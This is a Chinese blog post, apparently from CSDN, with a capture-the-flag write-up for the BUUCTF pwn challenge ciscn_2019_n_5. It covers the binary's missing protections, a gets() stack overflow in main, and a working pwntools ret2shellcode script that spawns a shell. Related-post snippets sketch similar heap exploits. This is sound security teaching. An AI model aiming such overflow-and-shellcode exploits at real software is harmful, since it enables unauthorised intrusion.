BUU刷题-Pwn-ciscn_2019_n_5

最新推荐文章于 2025-02-20 15:16:49 发布
原创 最新推荐文章于 2025-02-20 15:16:49 发布 · 200 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #linux #c语言

文章详细介绍了如何利用一个没有栈Canary、NX保护和RELRO的ELF程序,通过读取用户输入覆盖内存中的数据,注入并执行shellcode来获取shell。首先,分析了程序的内存布局和存在的漏洞,然后编写脚本来向name变量写入shellcode,并使用gdb进行调试。最后,通过发送特定payload远程连接到程序以触发shellcode执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路:

泄露或修改内存数据:

  1. 堆地址:无需
  2. 栈地址:无需
  3. libc地址:无需
  4. BSS段地址:无需
    劫持程序执行流程:[[ret2shellcode(栈溢出执行shellcode)]]
    获得shell或flag:[[利用shellcode获得shell]]
学到的知识:
题目信息:
┌──(kali㉿kali)-[~/Desktop]
└─$ file ciscn_2019_n_5 
ciscn_2019_n_5: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9e420b4efe941251c692c93a7089b49b4319f891, with debug_info, not stripped
                                                                                               
┌──(kali㉿kali)-[~/Desktop]
└─$ checksec --file=ciscn_2019_n_5 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      SymbolsFORTIFY Fortified       Fortifiable     FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   77) Symbols      No    0               2               ciscn_2019_n_5

libc版本:
wp借鉴:

核心伪代码分析:

存在利用的的代码:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text);
  return 0;
}
分析:

通过向name中写入shellcode,并执行该shellcode。

脚本:
from pwn import *
context(log_level='debug',arch='amd64',os='linux')

pwnfile='./ciscn_2019_n_5'
#sh=remote('node4.buuoj.cn',29945)
elf = ELF(pwnfile)
sh=process(pwnfile)

shellcode=asm(shellcraft.sh())

name=0x601080
sh.recvuntil("name\n")

sh.sendline(shellcode)

gdb.attach(sh)

sh.recvuntil("What do you want to say to me?\n")
payload=b"A"*0x28+p64(name)

sh.sendline(payload)

sh.interactive()
ciscn_2019_n_5
qq_39869547的博客
01-11 1095
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
buuctf之ciscn_2019_c_1
weixin_54452942的博客
04-18 914
通俗易懂
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1079
[buuctf]ciscn_2019_n_5
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 809
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 826
[BUUCTF-pwn]——ciscn_2019_n_5 目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 414
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
BUUCTF-PWN记录-22
weixin_44145820的博客
05-18 796
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-PWN记录-21
weixin_44145820的博客
05-15 774
目录wdb_2018_1st_babyheap(unlink, UAF) wdb_2018_1st_babyheap(unlink, UAF) add的大小固定为0x20 edit机会只有三次 指针悬挂 利用思路如下: 进行几次添加 add(0, (p64(0)+p64(0x31))*2) add(1, 'aaa\n') add(2, 'aaa\n') add(3, 'aaa\n') add(4, '/bin/sh\n') 删除0和1,再删除一次0,此时show(0)能泄露出heap的地址
BUUCTF-PWN记录-14
weixin_44145820的博客
04-29 906
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4469
BUUCTF记录
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1848
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTF ciscn_2019_n_5
Helloity的博客
02-09 3308
先附上目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
【CTF】ciscn_2019_n_5
凉水的博客
04-22 1075
目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
buuctf_ciscn_2019_n_5
最新发布
2301_81060697的博客
02-20 350
buuctf
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 235
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值